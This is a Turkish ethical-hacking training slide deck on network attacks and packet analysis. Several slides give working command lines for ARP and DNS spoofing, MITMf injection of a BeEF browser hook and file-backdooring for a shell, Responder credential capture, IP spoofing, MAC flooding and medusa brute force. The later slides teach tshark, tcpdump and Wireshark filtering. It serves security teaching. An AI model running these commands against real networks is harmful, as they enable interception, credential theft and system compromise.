Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Beyaz Şapkalı Hacker CEH Eğitimi - Ağ Tabanlı Saldırılar ve Paket Analizi

2,193 views

Published on

Bu sunum, Prisma tarafından verilen “Uygulamalı Beyaz Şapkalı Hacker Eğitimi v1” de anlatılan bir üniteye aittir.

PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com

Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.

Published in: Education
  • Login to see the comments

Beyaz Şapkalı Hacker CEH Eğitimi - Ağ Tabanlı Saldırılar ve Paket Analizi

  1. 1. www.prismacsi.com © All Rights Reserved. 1 Uygulamalı Beyaz Şapkalı Hacker Eğitimi Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
  2. 2. www.prismacsi.com © All Rights Reserved. 2 Ağ Tabanlı Saldırılar
  3. 3. www.prismacsi.com © All Rights Reserved. 3 Konular • Ağ Tabanlı Saldırılar • DoS & DDoS Saldırılarına Giriş • MiTM Saldırıları ve Kullanılan Araçlar • Arp Spoofing Saldırıları • DNS Spoofing Saldırıları • MAC Flooding Saldırıları • Parola Kırma Saldırıları • Kullanılan Araçlar
  4. 4. www.prismacsi.com © All Rights Reserved. 4 DoS & DDoS Saldırıları • DoS (Denial of Service) ve DDoS (Distributed Denial of Service) saldırılarında amaç hedef sunucu, servis veya uygulamanın servis dışı kalmasını sağlamaktır. • Bant genişliğine yönelik bir saldırı gerçekleştirilebilir. • Sunucu kaynakları aşırı kullanarak da bir saldırı simüle edilebilir. • Uygulama kaynaklarına yönelik bir saldırı gerçekleştirilebilir. • DoS, tek kaynaktan hedefe doğru trafik üretilir. • DDoS, birden fazla kaynaktan hedefe doğru trafik üretilir. • Bir hacking tekniği olarak değerlendirilmez fakat bilgi güvenliğinin 3 temel kriterinden biri olan erişilebilirliği tehdit ettiği ve büyük etkiler yarattığı için oldukça kritik bir atak tipidir.
  5. 5. www.prismacsi.com © All Rights Reserved. 5 Denial of Service • Denial of Service • Servis Dışı Bırakma • Tek kaynaktan çok sayıda akıllı istek yapılabilir. • Uygulama, sunucu veya servis üstündeki zafiyeti kullanarak direk erişilemez hale getirilebilir.
  6. 6. www.prismacsi.com © All Rights Reserved. 6 Distributed Denial of Service • Süreç bir botnet kurmak ile başlıyor. • Önce bir veya birden fazla zafiyeti kullanarak büyük ağlara, sunuculara, uygulamalara saldırılar gerçekleştiriliyor. • Ele geçirilen sunuculara C2 bağlantı araçları yükleniyor. • Zombi bilgisayarlar artık kontrol altında. • Elinizin altında bir ordu var! • Bir botnet servisini kiralayabilirsiniz veya satın alabilirsiniz. • Bot ve Botnet kavramları
  7. 7. www.prismacsi.com © All Rights Reserved. 7 DDoS Servisi Kiralama *Source: https://www.csoonline.com/article/3180246/data-protection/hire-a-ddos-service-to-take-down-your-enemies.html
  8. 8. www.prismacsi.com © All Rights Reserved. 8 Neyden Korkuyoruz? • Botnetlere erişim oldukça kolay • Bir siber saldırı, hacker ne zaman isterse gelebilir • Kurumsal taraftan bakarsak: • Maddi kayıplar yaşanabilir • Erişilebilirlik problemleri • Prestij • Maddi kayıp • Daha fazla maddi kayıp • Hepimizin maddi kaybı J
  9. 9. www.prismacsi.com © All Rights Reserved. 9 Distributed Denial of Service • Botnetleri nasıl oluşturuyorlar? Zombie bilgisayarları nasıl ele geçiriyorlar? • Örnek olarak • MS17-010 zafiyeti • Wordpress, Drupal, Joomla gibi uygulamalarda keşfedilen zafiyetler • Router, switch gibi cihazlarda keşfedilen zafiyetler • Parola kırma saldırıları, basit parola kullanımı
  10. 10. www.prismacsi.com © All Rights Reserved. 10 DDoS Saldırı Çeşitleri • Volumetric DDoS Saldırıları • Hedef bant genişliğini tüketmek • Böylece iletişim engellenecek • Dikkat edin kendi bant genişliğinizi tüketmeyin J • Atak tipleri: • ICMP Flood • UDP Flood • Smurf DoS
  11. 11. www.prismacsi.com © All Rights Reserved. 11 DDoS Saldırı Çeşitleri • Protokol Tabanlı DDoS Saldırıları • Hedefin paket birleştirme yapmasını engellemek • Paketleri parçala ve binlerce , milyonlarca gönder! • Atak tipleri: • SYN Flood • Combo SYN Flood
  12. 12. www.prismacsi.com © All Rights Reserved. 12 DDoS Saldırı Çeşitleri • Uygulama Katmanında Gerçekleştirilen DDoS Saldırıları • Hedef uygulama ve uygulamanın çalıştığı sunucunun kaynaklarını tüketmek • Böylece servisin çalışması engellenecek • Kredi çekme uygulaması hatırlatması! • Atak türleri: • HTTP(s) GET/POST • Slowloris
  13. 13. www.prismacsi.com © All Rights Reserved. 13 Örnek Saldırı: ICMP Flood • Tür olarak volumetric DDoS saldırılarına girmekte • Amaç bant genişliğini doldurarak erişimi engellemek • İçerisinde kullandığı protokol ICMP protokolüdür.
  14. 14. www.prismacsi.com © All Rights Reserved. 14 Örnek Saldırı: UDP Flood • Stateless çalışması bizim için bir avantaj olacak. • Random portlara durmadan paket gönderiliyor. • Sunucu tarafında yapılan kontroller bir yerden sonra erişimi engelliyor. • IP Spoofing yapılabilir. • Amplification saldırıları için maden!
  15. 15. www.prismacsi.com © All Rights Reserved. 15 Amplification Saldırıları • IP Spoofing yapılabilir. • Basit bir istek yaklaşık 80 kata kadar büyütülerek hedef sunucuya iletilebilir. • Bu elinizdeki 1 gb bandwith ile 80gb saldırı yapabileceğiniz anlamına gelmektedir. • DNS Amplification • Memcached Amplification • Github amplification saldırılarından nasibini alan ilk hedef oldu. Yaklaşık 650 gigabit lik bir saldırı gerçekleştirildi.
  16. 16. www.prismacsi.com © All Rights Reserved. 16 Örnek Saldırı: SYN Flood • TCP flagleri içerisindeki SYN flagi kullanılarak gerçekleştirilir. • Çok sayıda gönderimi sonrası hedef sisteme erişim engellenebilir. • SYN paketi gönderildi. • Cevap olarak SYN+ACK geldi. • ACK paketi geri gönderilmedi. • Fakat sunucu hala ACK paketinin gelmesini bekliyor.
  17. 17. www.prismacsi.com © All Rights Reserved. 17 Örnek Saldırı: HTTP(s) GET/POST DDoS • Saldırı uygulama katmanında gerçekleşmektedir. • Apache / IIS sunucularında çalışan uygulamalara GET ve/veya POST isteği ile yapılan aşırı istek sunucuyu çaresiz bırakabilir. • Yakalanması çok daha zordur çünkü loglar analiz edildiğinde gerçekleştirilen isteğin normal bir istek olduğu görülecektir. • Doğal DDoS – Sınav sonuçlarının açıklanması ve çöküş • IMDB: 8.2 Tür: Dram
  18. 18. www.prismacsi.com © All Rights Reserved. 18 Örnek Saldırı: Slowloris • Saldırı uygulama kaynağında gerçekleştirilmektedir. • Slowhttp • Tespiti diğer saldırı tiplerine göre daha zor. • Örneğin HTTP isteğini başlattınız. • Bir sonraki paketi daha yavaş ve içerik tamamlanmayacak şekilde gönderiyorsunuz. • Bir türlü HTTP paketi tamamlanmıyor. Bir sonraki, bir sonraki…. • Sunucu? Down J
  19. 19. www.prismacsi.com © All Rights Reserved. 19 Örnek Saldırı: Exploit ile DoS Saldırısı • Öncelikle hedef sunucuda bir analiz gerçekleştirilmeli ve zafiyetler keşfedilmelidir. • Zafiyet sadece sunucu veya serviste olmayabilir. Bunların üstünde çalışan bir uygulamada da olabilir. • Exploit! Down. • MS12-020 zafiyeti ile bir sunucunun crash edilmesi. • Mavi ekrandan sonra sunucu yeniden başlayacaktır. • Bu şekilde her 10 sn de bir exploiti çalıştırsanız, sunucu ayağa kalkamayacak. • Patch!
  20. 20. www.prismacsi.com © All Rights Reserved. 20 ARP Protokolü Nedir? • ARP, LAN içerisindeki iletişimi sağlamaktadır. • IP adresi – MAC (Fiziksel adres) eşleştirmesini sağlamaktadır. • DNS mantığı ile çalışır.
  21. 21. www.prismacsi.com © All Rights Reserved. 21 ARP Spoofing Saldırıları • Arp zehirlemesi olarak da adlandırılmaktadır. • Saldırganlar ağ cihazları ile bilgisayarlar arasına girerek trafiği manipüle etme imkanına sahip olmaktadır. • Saldırıların başarılı bir şekilde gerçekleştirilebilmesi için IP Forwarding özelliğinin aktifleştirilmesi gerekmektedir. • echo 1 > /proc/sys/net/ipv4/ip_forward
  22. 22. www.prismacsi.com © All Rights Reserved. 22 Man in The Middle – MiTM Saldırıları • Yerel ağda hackerın hedefi bir şekilde kurbanın trafiğini ele geçirmek veya manipule etmek olacaktır. • Bunu yapabileceği en iyi saldırı tiplerinden birisi de MiTM saldırılarıdır. • Layer 2 de gerçekleştiği için aynı ağa girmesi gerekmekte. • Show başlasın… • Imdb: 9.5 Tür: Vahşet
  23. 23. www.prismacsi.com © All Rights Reserved. 23 Man in The Middle – MiTM Saldırıları
  24. 24. www.prismacsi.com © All Rights Reserved. 24 MiTM Saldırılarına Giriş • ARP Spoof için ilk adım: • arpspoof –i eth0 –t 10.0.1.5 10.0.1.1 • Ağı zehirlemeye başlayacaktır. • Urlsnarf ile trafiğin dinlenmesi sağlanabilir • urlsnarf -i eth0
  25. 25. www.prismacsi.com © All Rights Reserved. 25 MiTM – Ettercap • MiTM atakları için kullanılan ve kali içerisinde direk gelen bir araç. Yeni çıkan araçlardan sonra eski popülerliğini kaybetmiş durumda. • Gerçekleştirilebilecek ataklar: • Arp Poisoning saldırıları • DNS Poisoning saldırıları • DoS saldırıları
  26. 26. www.prismacsi.com © All Rights Reserved. 26 MiTM Framework • Oldukça yetenekli ve gönülleri fetheden modüllere sahip açık kaynak yazılım • Python programlama dili ile geliştirilmiş ve platform bağımsız çalışmakta. • MiTM atakları ile kombine edilebilecek birçok atağı simüle edebilirsiniz. • JS-inject ile yapılan isteklere javascript enjeksiyonu • Beef ile birlikte kullanılıyor • Browser hak! • File Pwn ile indirilen dosyalara zararlı yerleştirme • Direk meterpreter shell alabilirsiniz.
  27. 27. www.prismacsi.com © All Rights Reserved. 27 MiTM Framework - Uygulama • python mitmf.py -i eth0 --spoof --arp --gateway 10.0.1.1 • Tüm subnete MiTM saldırısı gerçekleştirilebilir. • python mitmf.py -i enp3s0 --inject --js-url http://beefserver:3000/hook.js • Beef ile browser ele geçirmek için zararlı javascript dosyası inject edilebilir. • python mitmf.py -i enp3s0 --spoof --dns --arp --target 10.0.1.0/24 --gateway 10.0.1.1 • Config dosyasında var olan ayarlar ile birlikte DNS spoof saldırısı gerçekleştirilebilir. • python mitmf.py --spoof --arp -i wlan0 --gateway 10.0.1.1 --target 10.0.1.5 –filepwn • Kurban bir dosya indirirse sistemi üzerinde direk bir shell açılabilir.
  28. 28. www.prismacsi.com © All Rights Reserved. 28 Bettercap • Bettercap ‘de yine ettercap ten esinlenen ve içeriğini gelişmiş atakları simüle edebilecek şekilde geliştiren bir araç. • Oldukça başarılı bir şekilde çalışıyor. • MiTM saldırıları simüle edilebiliyor. • Mobil cihazlara yönelik de saldırı tiplerini içinde barındırıyor.
  29. 29. www.prismacsi.com © All Rights Reserved. 29 Cain&Able • Windows üzerinde çalışıyor ve yine MiTM ataklarını simüle etmek amacıyla kullanılıyor. • Eskide kaldı fakat hala daha oldukça başarılı bir şekilde çalışıyor. • İçinde birçok farklı özellik de mevcut • Gerçekleştirilebilecek ataklar: • Arp Spoofing saldırıları • DNS Spoofing saldırıları • Parola Kırma saldırıları
  30. 30. www.prismacsi.com © All Rights Reserved. 30 MiTM için Alınabilecek Önlemler • Arp spoof saldırılarını engelleyen gelişmiş switch veya routerlar kullanılabilir. • Statik ARP tabloları ile birlikte olası arp tablosunu zehirleyecek saldırıların önüne geçilebilir. • Statik kayıtlar en etkili çözümdür fakat büyük yapıdaki kurumlar için iyi bir çözüm olmayacağı kesin. • Arp spoofing saldırılarını algılayan yazılımsal çözümler de kullanılabilir.
  31. 31. www.prismacsi.com © All Rights Reserved. 31 LLMNR – NETBIOS Atakları • Sistemler DNS çözümlemesi yapamadığında bir LLMNR isteği oluşturur ve tüm broadcaste yayın yapar. • LLMNR ‘ın da altyapısı DNS’e dayanmaktadır. • 224.0.0.252 , TCP/UDP 5335 portu • NETBIOS-NS (Name Service) – İsim çözme amaçlı kullanılıyor. • Bir PC ismi düşünün : PRISMA-DC • Buna bir bağlantı yapmaya çalıştığımızı düşünelim : PRISMA-DV • Bir harfi hatalı yazdık şimdi ne olacak?
  32. 32. www.prismacsi.com © All Rights Reserved. 32 LLMNR – NETBIOS Atakları • Responder - LLMNR/NETBIOS Poisoner • https://github.com/SpiderLabs/Responder • responder –i eth0 • Hatalı istek geldi ve responder cevabı verdi. • Kullanıcı adı ve hash bilgisi gönderildi. • NTLMv2 Hashi ele geçirebilirsiniz. • Hashi kır ve kullan! • python mitmf.py -i eth0 --responder --wredir --nbtns
  33. 33. www.prismacsi.com © All Rights Reserved. 33 LLMNR – NETBIOS Atakları • Responder - LLMNR/NETBIOS Poisoner • WPAD Saldırısı • WPAD = Web Proxy Auto-Discover Protocol • İnternete erişim için bir proxye ihtiyacınız var ve bunu DHCP vs ile otomatize dağıtmak istiyorsunuz. = WPAD • İstemci WPAD verileri için DHCP’ye erişemediğinde LLMNR sorgusu yapacaktır. • Bu noktada yine responder ile devreye girilebilir.
  34. 34. www.prismacsi.com © All Rights Reserved. 34 LLMNR – NETBIOS Atakları • Responder - LLMNR/NETBIOS Poisoner • responder –i eth0 –wFb • WPAD isteği geldi. • Responder isteği karşıladı ve cevabı döndürdü. • Proxy tanımlaması için yetki gerekli. İstemci kullanıcı adı ve parolayı iletti. • Açık metin veriler elde edildi! • python mitmf.py -i eth0--spoof --arp --gateway 10.0.1.1 --responder –wpad
  35. 35. www.prismacsi.com © All Rights Reserved. 35 IP Spoofing • Kaynak IP yi değiştirerek gerçekleştirilen siber saldırı tekniği • IP sahteciliği olarak da adlandırılmaktadır. • İsteği gönderdik, ya gelen cevap ne olacak? • Bu yüzden daha çok DoS/DDoS saldırılarında kullanılıyor. • Hping –a spoofedip -p 80 –S hedefip
  36. 36. www.prismacsi.com © All Rights Reserved. 36 Domain Name System - DNS nedir?
  37. 37. www.prismacsi.com © All Rights Reserved. 37 DNS Spoofing Saldırıları • DNS zehirlemesi saldırısı. • Hocam Facebook hesaplarını nasıl ele geçirebilirim? J • DNS isteklerini yakala ve sahte IP adresleri ile çözümlemelerini yap. • python mitmf.py --spoof --arp --iface eth0 --gateway IP --target IP --dns --domain facebook.com --dnsip IP
  38. 38. www.prismacsi.com © All Rights Reserved. 38 MAC Flooding • Ağ cihazlarını hedef aldınız ve çalışmalarını engellemek istiyorsunuz. • ARP tablolarını doldursak? • ARP tablosu dolarsa cihazlar hub’a dönüşecektir. • Bu da tüm trafiği networke yayacağı anlamına gelir.
  39. 39. www.prismacsi.com © All Rights Reserved. 39 MAC Flooding - DEMO • Macof aracı ile arp tablosu doldurma • macof –i eth0 –d 192.168.1.1
  40. 40. www.prismacsi.com © All Rights Reserved. 40 DHCP Starvation • DHCP içerisinde bir IP havuzu mevcut ve her yeni gelen istemciye buradan bir IP kiralaması yapıyor. • İstemci geldi, IP konfigürasyonunu istedi, aldı ve erişimlerini sağladı. • Peki biz birden fazla konfigürasyon istersek? • DoS – Denial of Service • Sahte DHCP Server ayaklandır ve tüm trafik senin üstünden geçsin J
  41. 41. www.prismacsi.com © All Rights Reserved. 41 DHCP Spoof • Starvation ile DHCP servisini devre dışı bıraktık. • Sahte bir DHCP servisi yaratarak gelen istekleri karşılayabiliriz. • Böylece onlara sahte gateway veya dns adresi verebilir ve trafiklerini üstümüzden geçirebiliriz. • python mitmf.py -i eth0 --spoof --dhcp
  42. 42. www.prismacsi.com © All Rights Reserved. 42 Parola Kırma Saldırıları • Ağda birçok saldırıyı denedik. • Birde parola kırma saldırılarını test etmek gerekiyor. • Aktif tarama sırasında birçok port keşfettik ve bunların üstünde çalışan servislerin analizini gerçekleştirdik. • Örneğin aşağıdaki servislerde basit bir kullanıcı adı ve parola ikilisi yakalansa? • SSH • FTP • SMB • TELNET • HTTP
  43. 43. www.prismacsi.com © All Rights Reserved. 43 Parola Kırma Saldırıları • Parola kırma saldırılarında en sevdiğimiz araç : medusa J • medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M http • medusa -h 10.0.1.5 –U userlistesi.txt –p “secretpass” -M smbnt • medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M ftp • medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M telnet • Medusa aşağıdaki tüm servisleri desteklemektedir. • AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VNC
  44. 44. www.prismacsi.com © All Rights Reserved. 44 Sniffing & Paket Analizi • Tshark ile başlayalım. • Açık kaynak kodlu güçlü bir paket analiz programıdır. • Komut satırından kullanılır. (Wireshark’ın komut satırından kullanılan hali gibi düşünülebilir.) • GUI olmamasının dezavantajı birden fazla network sniffinde komut satırından kullanışlı olmayışıdır. • Uzaktan bağlantılar için uygun
  45. 45. www.prismacsi.com © All Rights Reserved. 45 TShark Kullanımı • Interfaceleri listelemek için; • tshark -D
  46. 46. www.prismacsi.com © All Rights Reserved. 46 TShark Kullanımı • Parametresiz kullanımda, aktif olan interface’i kullanarak dinleme yapar.
  47. 47. www.prismacsi.com © All Rights Reserved. 47 TShark Kullanımı • Arabirim belirterek dinlemek için -i parametresi kullanılır. • tshark -i eth0
  48. 48. www.prismacsi.com © All Rights Reserved. 48 TShark Kullanımı • Yakalanan paketleri kaydetmek için -w, okumak içinde -r parametresi kullanılır; • tshark -w prisma.pcap • Kaydedilen paketler libpcap framework destekli bir analiz programı ile okunabilir. (Wireshark) • Pcap şeklinde dosyasına kaydetmek yerine text haldede kaydedebiliriz. Bunun için; • tshark > prisma.txt
  49. 49. www.prismacsi.com © All Rights Reserved. 49 TShark Kullanımı • Paket sayısını kısıtlamak için -c parametresi kullanılır. • tshark -c 500 • Paket yakalarken filtreleme yapmak için -f parametresi kullanılır. “tcp” “udp” “icmp” “dns” ... • tshark -f “tcp”
  50. 50. www.prismacsi.com © All Rights Reserved. 50 TShark Kullanımı • Filtreleme yapmak için; • tshark -f <>
  51. 51. www.prismacsi.com © All Rights Reserved. 51 TShark Kullanımı • Filtreleme yapmak için; • tshark -Y <>
  52. 52. www.prismacsi.com © All Rights Reserved. 52 TShark Kullanımı • -T parametresi ps, pdml, psml, fields, text parametreleri ile kullanılır. • ps tek satırlık özet bilgiler verir • psml XML formatında çıktı üretir.
  53. 53. www.prismacsi.com © All Rights Reserved. 53 TShark Kullanımı • -f ve -Y parametreleri ile birlikte filtreleme yapmak; • 192.168.5.5 IP adresine giden veya gelen tüm paketlerin hedefinin IP adresini gösterin. • tshark -f "host 192.168.5.5" -Y "ip.dst"
  54. 54. www.prismacsi.com © All Rights Reserved. 54 TShark Kullanımı • HTTP isteklerini dinlemek için; • tshark -Y http.request -T fields -e http.host -e http.user_agent • -T parametresi alan adlarını ayıklamak istediğimizi ve -e ile de görmeyi istediğimiz yeri seçiyoruz.
  55. 55. www.prismacsi.com © All Rights Reserved. 55 TShark Kullanımı • Belirli bir port üzeriden akan trafiği izlemek için; • tshark -r prismacsi.pcap -R “tcp.port==443” • 443 dışında ki paketleri izlemek istersek; • tshark -r prismacsi.pcap -R “!(tcp.port=443)” • -R parametresi paket yakalama işlemi bittikten dosya pcap dosyasını okurken filtreleme yapmaya yarar.
  56. 56. www.prismacsi.com © All Rights Reserved. 56 Tcpdump • Linux tabanlı sistemlerde TCP/IP paketlerini yakalamak ve analiz etmek için kullanılan bir araçtır. • İlk olarak 1987’de yılında Lawrence Berkeley Laboratuvarında geliştirildi. • Komut satırı kullanıyor. • Yakaladığı paketleri pcap şeklinde kaydedebildiği için libpcap kütüphanesi kullanan sniffing araçları tarafından okunabilir.
  57. 57. www.prismacsi.com © All Rights Reserved. 57 Promiscious Mod • Aynı subnetteki tüm paketlerin hedef fark etmeksizin bir kopyasını kendi üzerine alması olayıdır. Paket yakalarken promiscious mod sniffing araçları tarafından otomatik olarak başlatılır. Sniffer durduğunda ise kapatır. • Fiziksel makine üzerinde sanal işletim sistemlerinizin trafiğini görmek mümkündür. Ama iki sanal makine birbirlerinin trafiğini Promiscious Modu aktif ederek görebilir. • Tcpdump promiscious modu aktif ettiği için “root” yetkisi ile çalışmanız gerekiyor. Ya da suid biti verilmesi gerekiyor.
  58. 58. www.prismacsi.com © All Rights Reserved. 58 Tcpdump • Tcpdump’ı root olmadan çalıştırabilmek için CAP_NET_ADMIN ve CAP_NET_RAW özelliklerini kullanarak mümkün. • sudo groupadd pcap • sudo usermod -a -G pcap $USER • sudo chgrp pcap /usr/sbin/tcpdump • sudo setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump • sudo ln -s /usr/sbin/tcpdump /usr/bin/tcpdump
  59. 59. www.prismacsi.com © All Rights Reserved. 59 Tcpdump Kullanımı • Tüm arayüzleri dinlemeye başlamak için; • tcpdump
  60. 60. www.prismacsi.com © All Rights Reserved. 60 Tcpdump Kullanımı • Network Interface’leri listelemek için; • tcpdump -D
  61. 61. www.prismacsi.com © All Rights Reserved. 61 Tcpdump Kullanımı • Yalnız belirli bir Interface üzerinden paket yakalamak için -i parametresi kullanılır. • tcpdump -i eth0
  62. 62. www.prismacsi.com © All Rights Reserved. 62 Tcpdump Kullanımı • Zaman damgası; • 22:37:02 • Yön Belirteci • > • SYN Bayrağı • S TCP • TCP başlangıç seri numarası (ISN) • 2354677536 • Paketin parçalanmama özelliğinin bulunduğu • DF
  63. 63. www.prismacsi.com © All Rights Reserved. 63 Tcpdump Kullanımı • Tcpdump başlatılığında durdurulana kadar çalışmaya devam edecektir. -c parametresi ile yakalanacak paket sayısı sınırlandırılabilir. • tcpdump -c 10
  64. 64. www.prismacsi.com © All Rights Reserved. 64 Tcpdump Kullanımı • ASCII formatında çıktı almak için -A parametresi kullanılır. • tcpdump -A -i eth0
  65. 65. www.prismacsi.com © All Rights Reserved. 65 Tcpdump Kullanımı • HEX ve ASCII formatında çıktı alabilmek için; • tcpdump -XX -i enp0s20u1c4i2 • Ağı dinlerken pcap şeklinde kaydetmek için ; • tcpdump -w 0001.pcap -i enp0s20u1c4i2 • pcap dosyalarını okumak için; • tcpdump -r 0001.pcap
  66. 66. www.prismacsi.com © All Rights Reserved. 66 Tcpdump Kullanımı • Yalnızca tcp paketlerini yakalamak için • tcpdump -i enp0s20u1c4i2 tcp • Belirli bir portu dinlemek için • tcpdump -i enp0s20u1c4i2 port 22 • DNS çözümlemesi yapmadan tarama yapmak için (hızlı) • tcpdump -n -i enp0s20u1c4i2
  67. 67. www.prismacsi.com © All Rights Reserved. 67 Tcpdump Kullanımı • Kaynak IP verilerek dinleme yapmak için; • tcpdump -i enp0s20u1c4i2 src 192.168.1.1 • Hedef IP verilerek dinleme yapmak için; • tcpdump -i enp0s20u1c4i2 dst 192.168.1.2 • Örneğin kaynak IP’si 192.168.1.1 olan hedefi 192.168.1.2 olan paketleri izlemek için; • tcp dump src 192.168.1.1 and dst host 192.168.1.2
  68. 68. www.prismacsi.com © All Rights Reserved. 68 Tcpdump Kullanımı • Belirli bir hosta ait paketlerin izlenmesi için • tcpdump host 192.168.1.1 • Detaylı Loglama yapmak için -v parametresi kullanılır • tcp dump -v -i enp0s20u1c4i2 • Port çözümlemesi yapmamak için ; ( ssh yerine 22 yazması) • tcpdump -nn -i enp0s20u1c4i2
  69. 69. www.prismacsi.com © All Rights Reserved. 69 Tcpdump Kullanımı • Promisc Modu kapatarak Sniff yapmak için -p parametresi kullanılarak kapatılır. Pm modu kapatılarak sadece o arabirimden gelen ve o arabirimi ilgilendiren paketler izlenir. Tcpdump’ın çalıştığı makineye ait bir paket analizi yapmak istediğimiz zaman kullanılabilecek türden bir parametredir. • tcpdump -p -i enp0s20u1c4i2
  70. 70. www.prismacsi.com © All Rights Reserved. 70 Tcpdump Kullanımı • HTTP isteklerini listeleme • tcpdump -w prsm.pcap -nn -A -l -i eth0 | grep "User-Agent:"
  71. 71. www.prismacsi.com © All Rights Reserved. 71 Tcpdump Kullanımı • DNS istek ve cevapları yakalamak • sudo tcpdump -i eth0 -s0 port 53
  72. 72. www.prismacsi.com © All Rights Reserved. 72 Tcpdump Kullanımı • ICMP paketleri yakalama • sudo tcpdump -i enp0s20u1c4i2 -n icmp
  73. 73. www.prismacsi.com © All Rights Reserved. 73 Wireshark Bir çok işletim sistemi tarafından çalıştırılabilen, kullanışlı ve kullanıcı dostu arayüz sunan, paket yakalamak ve analiz etmek için kullanılan bir programdır.
  74. 74. www.prismacsi.com © All Rights Reserved. 74 Wireshark Wireshark’da paket yakalamaya öncelikle interface seçimi ile başlarız. Açılan sayfada kullanılabilir interface’leri bize listeler;
  75. 75. www.prismacsi.com © All Rights Reserved. 75 Wireshark
  76. 76. www.prismacsi.com © All Rights Reserved. 76 Wireshark • Filtreleme yapacağımız bölüm; • Paketlerin listelendiği bölüm;
  77. 77. www.prismacsi.com © All Rights Reserved. 77 Wireshark • Seçilen paketle ilgili bilgi aldığımız bölüm;
  78. 78. www.prismacsi.com © All Rights Reserved. 78 Wireshark • Seçilen paket hex dump halini görebileceğimiz bölüm; • Hex; • Verilerin 16lık tabanda tutulduğu halidir. Bir verinin hex hali incelenerek debugging yapılır.
  79. 79. www.prismacsi.com © All Rights Reserved. 79 Wireshark • Yakaladığımız paketler hakkında genel bilgilerinin bulunduğu bölüm; • Wireshark kurulumu yapmadan deneme yapmak için https://www.cloudshark.org adresinde online olarak mevcut trafikerle paket analiz testleri yapabilirsiniz.
  80. 80. www.prismacsi.com © All Rights Reserved. 80 Wireshark Filtrelemeler • Filtrelemeler üç şekilde yapılır • Display Filter: Wireshark filtreleri • Hex Value: Hex değerleri • String: Metin tabanlı arama
  81. 81. www.prismacsi.com © All Rights Reserved. 81 Display Filter • DHCP için bazı filtreler • bootp.option.dhcp == 1 (DISCOVERY packets) • bootp.option.dhcp == 2 (OFFER packets) • bootp.option.dhcp == 3 (REQUEST Packets) • bootp.option.dhcp == 4 (ACK Packets) • bootp • bootp.option.hostname • port 67 or port 68
  82. 82. www.prismacsi.com © All Rights Reserved. 82 Display Filter • DHCP Discover Ağda bir DHCP sunucu var mı diye broadcast paket gönderilir. • DHCP Offer Client tarafından gönderilen discovery paketi, DHCP sunucusu (birden fazla DHCP sunucusu var ise ilk offer paketini gönderen dikkate alınır) tarafından alınır. Client için IP adresi ve kira süresi belirlenir. Onaylanmak üzere clienta gider.
  83. 83. www.prismacsi.com © All Rights Reserved. 83 Display Filter • DHCP Request Offer mesajını onaylayan client, DHCP’ye IP adresi almak için istekte bulunur. • DHCP Acknowledgement DHCP sunucusu işlemin tamamlandığına dair mesaj gönderir ve client IP adresini alır.
  84. 84. www.prismacsi.com © All Rights Reserved. 84 Display Filter • DHCP paketlerini analiz edebilmek için • bootp.option.type == 53
  85. 85. www.prismacsi.com © All Rights Reserved. 85 Display Filter • ARP için bazı filtreler • arp • arp.opcode == 1 • arp.opcode == 2 • arp.src.hw_mac == “Kaynak mac adresi” • arp.dst.hw_mac == “Hedef mac adresi” • arp.duplicate-address-frame
  86. 86. www.prismacsi.com © All Rights Reserved. 86 Display Filter • ARP protokolü nasıl çalışır?
  87. 87. www.prismacsi.com © All Rights Reserved. 87 Display Filter
  88. 88. www.prismacsi.com © All Rights Reserved. 88 Display Filter • HTTP için bazı filtreler • http.request.method==POST • http.request.method==GET • http.user_agent == “User_Agent” • http.response.code == 200 • http • http.referer
  89. 89. www.prismacsi.com © All Rights Reserved. 89 Display Filter
  90. 90. www.prismacsi.com © All Rights Reserved. 90 Display Filter
  91. 91. www.prismacsi.com © All Rights Reserved. 91 Display Filter
  92. 92. www.prismacsi.com © All Rights Reserved. 92 Display Filter • DNS için bazı filtreler • dns • dns.qry.name == "prismacsi.com” • dns.qry.type == 1 (A Record Type)dns.qry.type == 255 (ANY Record Type) • dns.qry.type == 2 (NS name server)dns.qry.type == 15(MX mail exchange
  93. 93. www.prismacsi.com © All Rights Reserved. 93 Display Filter
  94. 94. www.prismacsi.com © All Rights Reserved. 94 Display Filter
  95. 95. www.prismacsi.com © All Rights Reserved. 95 Display Filter
  96. 96. www.prismacsi.com © All Rights Reserved. 96 Display Filter • IP için bazı filtreler • ip.addr • ip.ttl • ip.src == 127.0.0.1 • ip.dst == 127.0.0.2 • ip.version == 4
  97. 97. www.prismacsi.com © All Rights Reserved. 97 Display Filter
  98. 98. www.prismacsi.com © All Rights Reserved. 98 Display Filter
  99. 99. www.prismacsi.com © All Rights Reserved. 99 Display Filter • TCP için bazı filtreler • tcp.flags.syn == 1 • tcp.srcport == 80 • tcp.port == 80 • tcp.dstport == 443
  100. 100. www.prismacsi.com © All Rights Reserved. 10 0 Display Filter
  101. 101. www.prismacsi.com © All Rights Reserved. 10 1 Display Filter
  102. 102. www.prismacsi.com © All Rights Reserved. 10 2 Display Filter
  103. 103. www.prismacsi.com © All Rights Reserved. 10 3 Display Filter
  104. 104. www.prismacsi.com © All Rights Reserved. 10 4 Display Filter • ICMP için bazı filtreler • icmp.type • icmp.code
  105. 105. www.prismacsi.com © All Rights Reserved. 10 5 Display Filter
  106. 106. www.prismacsi.com © All Rights Reserved. 10 6 Display Filter
  107. 107. www.prismacsi.com © All Rights Reserved. 10 7 Display Filter • FTP için bazı filtreler • ftp.request.command == PASS • ftp.request.command == USER • ftp.response.arg == "Login successful." • ftp.request • ftp.request.command
